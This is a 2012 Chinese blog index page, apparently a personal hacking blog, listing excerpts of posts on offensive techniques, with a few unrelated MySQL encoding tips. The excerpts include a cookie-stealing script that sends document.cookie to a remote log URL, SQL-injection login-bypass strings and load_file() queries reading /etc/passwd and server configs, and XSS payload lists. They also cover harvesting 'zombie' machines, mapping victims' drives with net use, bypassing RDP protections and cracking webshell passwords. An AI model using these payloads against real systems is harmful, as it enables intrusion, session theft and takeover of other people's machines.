上一页 1 ··· 9 10 11 12 13 14 下一页
摘要: 转自:http://hi.baidu.com/unixshell/item/2b57af1112ec9df9746a8430配置beef和metasploit(包含安装Beef过程)系统环境:BackTrack5R1软件版本:Beef0.4.3.6-alphametasploitv4.4.0-devsvnr15552一、前言之前对于BeEF毫无了解,好奇心驱使下便按部就班研究一下,虽然中途问题多多,但是最后还算成功,收获不少二、安装BeEF按照文章上所指,先删除BT5上面自带的版本稍旧的BeEFrm-rf/pentest/web/beef-ng然后通过Gitclone最新的BeEF代码gitc 阅读全文
posted @ 2012-11-19 11:03 山貓 阅读(1864) 评论(0) 推荐(0) 编辑
摘要: 转自:http://hi.baidu.com/unixshell/item/396c3e9968dbf4cfb625310cBeEF是目前欧美最流行的web框架攻击平台,它的全称 是theBrowserexploitationframeworkproject.最近两年国外各种黑客的会议都有它的介绍,很多 pentester对这个工具都有很高的赞美。通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过 浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。如何配置beef和metasploitwindo 阅读全文
posted @ 2012-11-19 10:32 山貓 阅读(777) 评论(0) 推荐(0) 编辑
摘要: 转自:http://www.2cto.com/Article/201207/140515.html作者 Joe Lynch[Dis9]1、引言Beef 一个很强大的xss 攻击框架新版的beef 还不是很熟悉2、测试开始msf > beef_connect http://192.168.2.106:3000 beef beef[*] Connected to http://192.168.2.106:3000msf > beef_onlineCurrently hooked browsers within BeEFId IP OS-- -- --0 1.1.1.2 Microsof 阅读全文
posted @ 2012-11-19 08:55 山貓 阅读(1738) 评论(0) 推荐(0) 编辑
摘要: 在evil.js文件中写如下代码,存储在www.test.com根目录下var img=document.createElement("img");img.src="http://www.test.com/log?"+escape(document.cookie);document.body.appendChild(img);然后在测试页,想办法让别人运行这段代码<script src="http://www.test.com/evil.js"></script>然后在web日志中可查看窃取的cookie信息如 阅读全文
posted @ 2012-11-19 01:43 山貓 阅读(500) 评论(0) 推荐(0) 编辑
摘要: 首先给个链接给你:http://www.google.com/webhp?hl=xx-hacker你会看到google的页面居然全部是乱码????n0rM4Ls34rChIm46356r00pZd1r3c70rY4DV4NC3D534RC|-|PR3F3R3N(3Z£4|\|6µ463700|54||480u7Google-Google.cominEnglishM4k3GoogleY0ur|-|0m3p463!你一定看不懂!但是Monyer和我的黑客兄弟们却是各个都懂的,因为这个就是传说中的黑客语言!让Monyer先给你翻译一遍!normalsearchimagesgrou 阅读全文
posted @ 2012-11-17 12:18 山貓 阅读(1579) 评论(0) 推荐(0) 编辑
摘要: 很多新手抓鸡的时候,为了IP段很头疼。有一种方法大家可以试试,我试验过还是可以的。首先选择一个你要扫的城市,比如:浙江打开百度,在里面输入浙江,然后出现一个某某网站,你把网站的地址复制一下然后用啊D或则别的工具转换一下,网站地址转换IP然后出现64.128.78.52(我随便写的)我们扫肉鸡可以选择61.128+15.78.52或则61.128-15.255.255其实意思就是第2个IP地址加上15或则减去15就是这个地址旁边所有的IP地址。 阅读全文
posted @ 2012-11-17 11:00 山貓 阅读(1545) 评论(0) 推荐(0) 编辑
摘要: 而且在一般情况下,一些功能对管理员来说也是没有必要的。如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。 我们只需要在isql窗口中输入:use mastersp_dropextendedproc 'xp_cmdshell'net use 映射盘符: \\肉鸡IP\肉鸡盘符譬如:net use z: \\1.1.1.1\c (把对方的c盘映射成你的z盘),察看一 阅读全文
posted @ 2012-11-17 10:50 山貓 阅读(251) 评论(0) 推荐(0) 编辑
摘要: 在开了3389终端之后但是连接不上的可能情况:(1).目标服务器是内网 终端端口是你开的话 99%需要端口转发 有时候如果服务器开了终端的话很有可能映射了也不就需要转发(2). 目标是外网 开了3389 但连接不上终端以下是各种情况可能原因及突破办法1. 突破安全狗限制连接终端:突破安全狗限制连接服务器终端:执行杀安全狗的exe2. 突破SecureRDP限制连接终端科普:SecureRDP是一款国外的软件,可以用该软件限制远程桌面登录的计算机名、MAC、IP,指定的才能登陆服务器的远程桌面,否则一律拒绝,支持Windows2003服务器操作系统,以下是这款限制软件的突破方法:执行目录echo 阅读全文
posted @ 2012-11-17 10:48 山貓 阅读(492) 评论(0) 推荐(0) 编辑
摘要: 在前面已经为大家演示了如何利用工具进行cookie欺骗,然后进入后台。现在我们从程序的角度上来学习如何挖掘代码中存在的cookie欺骗漏洞。还是以第二章中的那个心情网络投票系统来举例。我们先来看看在心情网络投票系统中系统是如何得到cookie的,它的程序其实就上上一节中采用cookie验证的那个例子,代码这里不在列举出来了,可以参考上面的。在上面的代码中,有样的两行代码:response.cookies("admin")=rs("admin")response.cookies("pass")=rs("pass")当 阅读全文
posted @ 2012-11-16 20:07 山貓 阅读(1127) 评论(0) 推荐(0) 编辑
摘要: 1:"or "a"="a2:'.).or.('.a.'='.a3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='10:'or'='or' 阅读全文
posted @ 2012-11-16 19:57 山貓 阅读(1113) 评论(0) 推荐(0) 编辑
摘要: 经典'or'='or'漏洞也叫身份验证登陆漏洞,这是一个比较老的漏洞,不过目前很多系统还是存在这样的漏洞。前面我们已经知道了利用'or'='or'这个漏洞我们就可以顺利的登陆网站后台,那么为什么输入这样的代码就可以进入后台呢?在讲这个漏洞之前我们先来回顾一点点数学知识。就是AND和OR运算符的运算规则,在第5章也讲了,不过为了给大家加深印象,这里还把他们的运算规则列出来。如果在一个关系式里,同时了AND和OR运算符,就会有一个优先级的问题,如果是相同的逻辑符,则按照从左到右的运算顺序。逻辑运算符AND和OR的运算优先次序是:先运算 阅读全文
posted @ 2012-11-16 19:53 山貓 阅读(1284) 评论(0) 推荐(0) 编辑
摘要: 一、load_file()函数的应用1.获得字段数order by nand 1=2 union select 1,22.load_file()获取敏感信息读取c:\boot.ini信息,要用十六进制的形式and 1=2 union select 1,load_file(0x633A5C626F6F742E696E69)其他敏感信息load_file(char(47)) 列出freebsd目录/etc/passwd读取httpd.conf/etc/init.d/apache/etc/init.d/apache2/etc/httpd/httpd.conf/etc/apache/apache.co 阅读全文
posted @ 2012-11-16 12:20 山貓 阅读(466) 评论(0) 推荐(0) 编辑
摘要: 转自:博客水木 http://shuimu.js.cn/mysql-php-character-set-encoding-settings-and-garbled-solution.htmlPHP显示MySQL查询结果时显示乱码对于新手在实际编程中是经常会遇到的问题,我们在接下来的文章中将会为大家具体介绍PMySQL字符集编码设置与PHP显示乱码的解决办法,希望对有需要的朋友们有所帮助。从乱码产生的原因来分析,乱码的产生一般有以下几种情况。1、网页编码与程序编码不一致的问题所谓的网页编码问题就是指你的html代码中定义的“charset”,例如以下这段代码:<head><ti 阅读全文
posted @ 2012-11-16 10:46 山貓 阅读(328) 评论(0) 推荐(0) 编辑
摘要: 转自:博客水木 http://shuimu.js.cn/php-mysql-dynamic-web-programming-error-correction-guide.html在WEB编程当中,数据库的作用已经越来越不容忽视。提到数据库,应当说PHP具有非常强大的数据库支持功能,从Access到Oracle,几乎 与所有的数据库系统都可以实现无缝连接。为了方便本文的讲解,我们将主要以MySQL为例进行说明。不过对于其它的数据库应用也同样适用。使用PHP进行数据库操作一般需要包括以下语句:<?php$Host="localhost";$MySQL_UserName=& 阅读全文
posted @ 2012-11-16 10:41 山貓 阅读(240) 评论(0) 推荐(0) 编辑
摘要: <html><head><title>mysql注入漏洞测试</title></head><body><?php$mysql_server_name='localhost';$mysql_username='root';$mysql_password='shanmao';$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password)or die('Could not connect: 阅读全文
posted @ 2012-11-16 10:38 山貓 阅读(225) 评论(0) 推荐(0) 编辑
摘要: 转自:http://www.2cto.com/database/201208/150897.html设置MySql5.5数据库的字符编码为UTF8,解决中文乱码问题1.在mysql压缩目录下,有一堆的参数配置文件,比如:my-small.ini,复制一下这个文件,自己改下名字,比如叫:my.ini 2.打开my.ini文件,增加如下参数: [client]:增加default-character-set=utf8参数 [client] #password = [your_password] port = 3306 socket = /tmp/mysql.sock default-charact 阅读全文
posted @ 2012-11-16 08:47 山貓 阅读(473) 评论(0) 推荐(0) 编辑
摘要: 1.标准的xss漏洞测试代码<script>alert('xss')</script>2.img图片标记属性跨站攻击代码<img src="javascript:alert(/xss/)"></img><img dynsrc="javascript:alert('xss')">3.无需"<>",利用html标记事件属性跨站(1)利用已知事件<img src="" onerror=alert("xs 阅读全文
posted @ 2012-11-16 06:22 山貓 阅读(2808) 评论(0) 推荐(1) 编辑
摘要: <% //这是ASP的标记str=trim(request("a")) //request对象作用是获取客户端表单中输入的数据response.write str //response也是ASP的一个对象,write是它的一个方法,其作用是往页面中输出//数据,在这里就是在页面中输出strresponse.write "<br>"response.write "<img src="&str&"></img>"%><form action=xss. 阅读全文
posted @ 2012-11-16 03:58 山貓 阅读(312) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2012-11-15 23:10 山貓 阅读(265) 评论(0) 推荐(0) 编辑
摘要: 上篇博客讲到了通过BurpSuit实现NC上传,今天将演示用BurpSuit破解WebShell的验证密码。其实,就破解而言,BurpSuit的基本原理和溯雪是一样的,但是在某些功能上要比前者完善一些。OK,Let'sGo!!!首先,在WebShell密码框处输入一个任意密码,以便抓取密码验证请求包。至于怎么抓取,这里就不多费口舌了,可以参考我的上一篇博客。分析数据包后,发现该请求包有两个重要参数(Pass和Cookie,红色字体部分),我们要测试的只有Pass参数。在History标签中找到我们要修改的请求包,右击→选择sendtointruder,接着就来到了Intruder模块。 阅读全文
posted @ 2012-11-15 22:50 山貓 阅读(771) 评论(0) 推荐(0) 编辑
上一页 1 ··· 9 10 11 12 13 14 下一页